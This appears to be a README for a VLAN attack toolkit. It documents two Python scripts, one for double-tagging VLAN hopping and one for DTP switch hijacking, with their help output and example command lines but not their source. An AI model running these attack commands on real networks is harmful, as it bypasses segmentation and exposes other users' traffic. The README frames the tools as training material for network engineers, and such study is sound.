VLAN attacks toolkit

The author has nothing to do with those who will use this tool for personal purposes to destroy other people's computer networks. The tools are presented for training purposes to help engineers improve the security of their network.

DoubleTagging.py - This tool is designed to carry out a VLAN Hopping attack. As a result of injection of a frame with two 802.1Q tags, a test ICMP request will also be sent.

DTPHijacking.py - A script for conducting a DTP Switch Spoofing/Hijacking attack. Sends a malicious DTP-Desirable frame, as a result of which the attacker's machine becomes a trunk channel. The impact of this attack is that you can bypass the segmentation of VLAN networks and see all the traffic of VLAN networks.

python3 DoubleTagging.py --help

.s    s.  .s        .s5SSSs.  .s    s.  .s5SSSs.  .s s.  s.  .s    s.
      SS.                 SS.       SS.       SS.    SS. SS.       SS.
sS    S%S sS        sS    S%S sSs.  S%S sS    S%S sS S%S S%S sSs.  S%S
SS    S%S SS        SS    S%S SS`S. S%S SS    S%S SS S%S S%S SS`S. S%S
SS    S%S SS        SSSs. S%S SS `S.S%S SS .sS::' SS S%S S%S SS `S.S%S
 SS   S%S SS        SS    S%S SS  `sS%S SS        SS S%S S%S SS  `sS%S
 SS   `:; SS        SS    `:; SS    `:; SS        SS `:; `:; SS    `:;
  SS  ;,. SS    ;,. SS    ;,. SS    ;,. SS        SS ;,. ;,. SS    ;,.
   `:;;:' `:;;;;;:' :;    ;:' :;    ;:' `:        `:;;:'`::' :;    ;:'

VLAN Double Tagging inject tool. Jump into another VLAN!

Author: @necreas1ng, <necreas1ng@protonmail.com>

usage: DoubleTagging.py [-h] --interface INTERFACE --nativevlan NATIVEVLAN --targetvlan TARGETVLAN --victim VICTIM --attacker ATTACKER

  -h, --help            show this help message and exit
  --interface INTERFACE
                        Specify your network interface
  --nativevlan NATIVEVLAN
                        Specify the Native VLAN ID
  --targetvlan TARGETVLAN
                        Specity the target VLAN ID for attack
  --victim VICTIM       Specity the target IP
  --attacker ATTACKER   Specify the attacker IP


python3 DoubleTagging.py --interface eth0 --nativevlan 1 --targetvlan 20 --victim --attacker
python3 DTPHijacking.py --help

.s    s.  .s        .s5SSSs.  .s    s.  .s5SSSs.  .s s.  s.  .s    s.
    SS.                 SS.       SS.       SS.    SS. SS.       SS.
sS    S%S sS        sS    S%S sSs.  S%S sS    S%S sS S%S S%S sSs.  S%S
SS    S%S SS        SS    S%S SS`S. S%S SS    S%S SS S%S S%S SS`S. S%S
SS    S%S SS        SSSs. S%S SS `S.S%S SS .sS::' SS S%S S%S SS `S.S%S
SS   S%S SS        SS    S%S SS  `sS%S SS        SS S%S S%S SS  `sS%S
SS   `:; SS        SS    `:; SS    `:; SS        SS `:; `:; SS    `:;
SS  ;,. SS    ;,. SS    ;,. SS    ;,. SS        SS ;,. ;,. SS    ;,.
 `:;;:' `:;;;;;:' :;    ;:' :;    ;:' `:        `:;;:'`::' :;    ;:'

DTP Switch Hijacking tool. Become a trunk!

Author: @necreas1ng, <necreas1ng@protonmail.com>

usage: DTPHijacking.py [-h] --interface INTERFACE

-h, --help            show this help message and exit
--interface INTERFACE
                      Specify your network interface


python3 DTPHijacking.py --interface eth0